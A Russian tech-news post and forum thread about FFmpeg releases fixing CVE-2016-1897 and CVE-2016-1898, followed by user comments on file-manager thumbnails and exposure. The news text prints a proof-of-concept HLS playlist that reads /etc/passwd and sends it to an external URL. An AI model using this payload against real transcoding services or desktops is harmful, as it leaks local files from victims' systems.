URL: https://www.opennet.me/cgi-bin/openforum/vsluhboard.cgi
Форум: vsluhforumID3
Нить номер: 106349
[ Назад ]

Исходное сообщение
"Обновление FFmpeg с устранением опасных уязвимостей"

Отправлено opennews , 16-Янв-16 19:17 
Доступны (http://ffmpeg.org/download.html) корректирующие обновления мультимедиа-пакета FFmpeg 2.8.5, 2.7.5, 2.6.7 и 2.5.10, в которых устранены (http://git.videolan.org/?p=ffmpeg.git;a=commit;h=e183075dc11...) опасные уязвимости (http://www.slideshare.net/MailRuGroup/security-meetup-22-mailru) (CVE-2016-1897, CVE-2016-1898), которые могут привести к выгрузке произвольных файлов в случае обработки специально оформленных файлов утилитами ffmpeg, ffprobe, avconv и avprobe. Например, уязвимость представляет угрозу сервисам, в которых осуществляется перекодирование или обработка поступающих от пользователей файлов при помощи ffmpeg/libav, и файловым менеджерам, использующим ffmpeg/libav для создания эскизов.


Уязвимость может использоваться для подстановки (https://github.com/ctfs/write-ups-2015/tree/master/9447-ctf-...) содержания произвольного локального файла в результат перекодирования или для отправки (http://habrahabr.ru/company/mailru/blog/274855) на произвольный внешний URL. Например, можно передать для обработки файл с произвольным расширением (avi, mov и т.п.), в котором добавить заголовок и данные плейлиста в формате HLS m3u8, указав в качестве одного из элементов блок "concat" с внешним URL и локальным файлом, например:


<font color="#461b7e">
   #EXTM3U
   #EXT-X-MEDIA-SEQUENCE:0
   #EXTINF:10.0,
   concat:http://test.com/header.m3u8|file:///etc/passwd
   #EXT-X-ENDLIST

</font>


В результате обработки данного файла ffmpeg загрузит http://test.com/header.m3u8, который может содержать:


<font color="#461b7e">
   #EXTM3U
   #EXT-X-MEDIA-SEQUENCE:0
   #EXTINF:,
   http://example.org?
</font>

После обработки header.m3u8 ffmpeg передаст содержимое file:///etc/passwd в составе запроса на URL "http://example.org". Если вместо операции concat в переданном для обработки файле ограничиться указанием file:///etc/test.txt, то будет создан мультимедийный файл, включающий первую строку указанного локального файла.


<center><iframe src="//www.slideshare.net/slideshow/embed_code/key/E8vCNOzffF2gs0" width="595" height="485" frameborder="0" marginwidth="0" marginheight="0" scrolling="no" style="border:1px solid #CCC; border-width:1px; margin-bottom:5px; max-width: 100%;" allowfullscreen></iframe></center>
<center><iframe width="640" height="360" src="https://www.youtube.com/embed/HRNPnbxrSCo?rel=0" frameborder="0" allowfullscreen></iframe></center>

URL: https://twitter.com/FFmpeg/status/688187976132603904
Новость: http://www.opennet.me/opennews/art.shtml?num=43685


Содержание

Сообщения в этом обсуждении
"Обновление FFmpeg с устранением опасных уязвимостей"
Отправлено soarin , 16-Янв-16 19:17 
% brew info ffmpeg
ffmpeg: stable 2.8.4 (bottled), HEAD

Вот так посмотришь чего-то и похакают...


"Обновление FFmpeg с устранением опасных уязвимостей"
Отправлено й , 17-Янв-16 16:55 
твои мак-серверы уже в безопасности, комрад:

> brew info ffmpeg

ffmpeg: stable 2.8.5 (bottled), HEAD

кстати, а какие практические применения мак-сервера кроме окружения для CI в яблочных проектах?


"В FFmpeg устранена уязвимость, которая может привести к утеч..."
Отправлено Anonplus , 16-Янв-16 19:43 
Самое крутое, что в той же убунте достаточно лишь скачать такой видеофайл и при создании эскиза в файловом менеджере сразу всё и произойдёт.

Вот более подробное описание непосредственно от человека, обнаружившего уязвимость и отправившего патч в FFmpeg: http://habrahabr.ru/company/mailru/blog/274855/


"В FFmpeg устранена уязвимость, которая может привести к утеч..."
Отправлено soarin , 16-Янв-16 20:03 
Ну так в линуксах же всюду эскизы в файловых менеджерах делаются с помощью ffmpeg, а не только в той же ubuntu.

"В FFmpeg устранена уязвимость, которая может привести к утеч..."
Отправлено anon1984 , 16-Янв-16 20:35 
нет

"В FFmpeg устранена уязвимость, которая может привести к утеч..."
Отправлено soarin , 17-Янв-16 13:25 
Ну что нет? Поглядел на Dolphin - тоже самое...

"В FFmpeg устранена уязвимость, которая может привести к утеч..."
Отправлено Аноним , 17-Янв-16 10:54 
Я у себя в KDE когда-то отключил из-за бага с disk i/o. Эти эскизы ещё попьют кровушки у народа.

"В FFmpeg устранена уязвимость, которая может привести к утеч..."
Отправлено Аноним , 16-Янв-16 22:00 
Пустил Tor через VPN. Скачал файл. Файл напрямую обратился к IP honeypot при запуске проигрывателя. ip добавлен в базу пиратов. Обращаемся к провайдеру и сверяем время/размер пакетов. Высылаем штраф или повестку в суд.
Если автоматизировать операцию можно получить миллиарды долларовс Европы, Австралии, Японии или США.

"В FFmpeg устранена уязвимость, которая может привести к утеч..."
Отправлено Аноним , 16-Янв-16 22:01 
Не Tor, а торрент клиент через Tor или VPN. Или их комбинацию.

"В FFmpeg устранена уязвимость, которая может привести к утеч..."
Отправлено Аноним , 16-Янв-16 22:32 
"Файл напрямую обратился к IP"

Чтобы специально подготовленный видеофайл отправил запрос, нужно 1). Чтобы он воспроизводился с помощью ffmpeg, а это только полутора процентов в мире 2). И вообще, это в плагине HTTP Live Streaming баг, а не в обычной воспроизводилке.


"В FFmpeg устранена уязвимость, которая может привести к утеч..."
Отправлено Аноно , 21-Янв-16 11:26 
Нет, достаточно ПРОСТО ИМЕТЬ: файловый менеджер с эскизами (практически все дистрибутивы linux).

А вот запускать надо с: свободный плеер (VLC/MPlayer) или ещё что-то использующее ffmpeg (например программу для работы с видео).


"В FFmpeg устранена уязвимость, которая может привести к утеч..."
Отправлено Аноним , 16-Янв-16 22:45 
Как он додумался до такого ?
вообще всегда после сообщения о нахождении какой-то дыры  у меня возникает вопрос КАК  человек смог додуматься до такого ?
Ибо я тоже так хочу

"В FFmpeg устранена уязвимость, которая может привести к утеч..."
Отправлено Аноним , 17-Янв-16 00:38 
человек либо копался в коде и сумел хорошо его понять, т.е. он или разраб, или зарабатывает на поиске багов именно в ffmpeg (это маловероятно); либо случайно напоролся, вероятность чего достаточно мала.
поэтому скорее всего разраб.

"В FFmpeg устранена уязвимость, которая может привести к утеч..."
Отправлено Crazy Alex , 17-Янв-16 04:22 
Вообще-то это скорее склад ума такой - понять, как нечто работает и оценить, что могло пойти не так. В сущности, для разработчика любых сложных систем это необходимый навык, только не у каждого он ещё дополняется достаточным интеллектуальным любопытством, чтобы после ментальных упражнений начинать ковыряться на практике и проверять свои предположения.

"В FFmpeg устранена уязвимость, которая может привести к утеч..."
Отправлено Аноним , 17-Янв-16 01:13 
Расслабься, тут нужно мозгом думать - не всем дано

"В FFmpeg устранена уязвимость, которая может привести к утеч..."
Отправлено Crazy Alex , 17-Янв-16 04:23 
Дано-то всем, но не всем нравится

"В FFmpeg устранена уязвимость, которая может привести к утеч..."
Отправлено Аноним , 17-Янв-16 11:17 
В данном случае довольно простая идея. Использовать плейлист вместо реальной дорожки. Остальное уже вокруг.

Чтобы так мочь, надо досконально знать вещи с уровня исходного кода реализации и выше. По времени примерно пять лет самообразования.


"В FFmpeg устранена уязвимость, которая может привести к утеч..."
Отправлено privation , 17-Янв-16 00:36 
это только часть айсберга

"В FFmpeg устранена уязвимость, которая может привести к утеч..."
Отправлено Аноним , 17-Янв-16 00:47 
его обычно с титаниками используют вроде blender, vlc, mpv, mplayer, chrome, etc.

"В FFmpeg устранена уязвимость, которая может привести к утеч..."
Отправлено Аноним , 17-Янв-16 11:19 
Ник cdump - что может значить буква си?

"В FFmpeg устранена уязвимость, которая может привести к утеч..."
Отправлено iZEN , 17-Янв-16 12:13 
% pkg info -r ffmpeg-2.8.4,1
ffmpeg-2.8.4,1:
    firefox-43.0.4_1,1
    gstreamer1-libav-1.6.2
    mpv-0.14.0,1
    youtube_dl-2016.01.14
    aqualung-1.0

"В FFmpeg устранена уязвимость, которая может привести к утеч..."
Отправлено Ыр2.0 , 17-Янв-16 15:16 
Когда во ффмпеге будет многопоточность для флака?

"В FFmpeg устранена уязвимость, которая может привести к..."
Отправлено arisu , 22-Янв-16 07:05 
хоспаде, дался всем этот /etc/passwd… ну, на здоровье. помогло чем? http://dpaste.com/3BMFXPB